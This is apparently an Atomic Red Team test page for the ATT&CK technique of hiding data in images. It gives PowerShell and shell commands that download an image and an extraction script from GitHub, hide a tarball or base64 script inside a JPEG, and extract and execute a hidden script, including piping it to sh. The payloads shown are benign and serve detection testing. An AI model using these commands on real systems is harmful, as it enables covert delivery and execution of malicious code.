T1001.002 - Data Obfuscation via Steganography

Description from ATT&CK

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.

Atomic Tests


Atomic Test #1 - Steganographic Tarball Embedding

This atomic test, named “Steganographic Tarball Embedding”, simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) within an image.

The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball file within the image, utilizing steganography techniques for data obfuscation.

This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected. By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.

Supported Platforms: Windows

auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | image_file | Image file which will be downloaded to be used to hide data | path | PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg| | tar_file | Tarz file containing random passwords | path | $env:PUBLIC\Downloads\T1001.002.tarz| | new_image_file | new image file ready for extraction | path | $env:PUBLIC\Downloads\T1001.002New.jpg| | passwords_file | Text file containing random passwords | path | $env:TEMP\random_passwords.txt|

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte

Cleanup Commands:

1
2
Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore

Dependencies: Run with
1
powershell
!

Description: Image file must exist
Check Prereq Commands:
1
2
3
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
Get Prereq Commands:
1
2
3
4
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
Description: File to hide within tarz file must exist
Check Prereq Commands:
1
2
3
if (!(Test-Path "#{passwords_file}")) {exit 1} else {
{exit 0}
}
Get Prereq Commands:
1
2
3
Write-Output "Generating random passwords and saving to file..."
$passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
$passwords | Out-File -FilePath "#{passwords_file}"
Description: Tarz file to embed in image must exist
Check Prereq Commands:
1
2
3
if (!(Test-Path "#{tar_file}")) {exit 1} else {
{exit 0}
}
Get Prereq Commands:
1
2
Write-Output "Generating tarz file..."
tar -cvf "#{tar_file}" "#{passwords_file}"



Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage

This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file. The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.

The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.

In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file.

Supported Platforms: Windows

auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | image_file | Malicious Image file which will be downloaded | path | PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg| | psimage_script | Extract-Invoke-PSImage Script downloaded | path | PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1|

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
cd "PathToAtomicsFolder\ExternalPayloads\"
Import-Module .\Extract-Invoke-PSImage.ps1
$extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
$scriptContent = Get-Content "$HOME\result.ps1" -Raw
$base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
$base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
$base64Strings | Set-Content "$HOME\decoded.ps1"
$decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
$textPattern = '^.+'  
$textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
$scriptPath = "$HOME\textExtraction.ps1"
$textMatches -join '' | Set-Content -Path $scriptPath
. "$HOME\textExtraction.ps1"

Cleanup Commands:

1
2
3
4
Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore 
Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore

Dependencies: Run with
1
powershell
!

Description: Image file must exist
Check Prereq Commands:
1
2
3
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
Get Prereq Commands:
1
2
3
4
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
Description: Extract-Invoke-PSImage must exist
Check Prereq Commands:
1
2
3
if (!(Test-Path "#{psimage_script}")) {exit 1} else {
{exit 0}
}
Get Prereq Commands:
1
2
3
4
New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
$scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}



Atomic Test #3 - Execute Embedded Script in Image via Steganography

This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.

Supported Platforms: Linux

auto_generated_guid: 4ff61684-ad91-405c-9fbc-048354ff1d07

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | script | Shell Script file to be embedded and executed | String | PathToAtomicsFolder/script.sh| | evil_image | The modified image with embedded script | String | PathToAtomicsFolder/evil_image.jpg| | image | Image file to be embedded | String | PathToAtomicsFolder/image.jpg|

Attack Commands: Run with
1
sh
!

1
cat "#{script}" | base64 | xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p | cat "#{image}" - > "#{evil_image}"; strings "#{evil_image}" | tail -n 1 | base64 -d | sh

Cleanup Commands:

1
rm "#{evil_image}"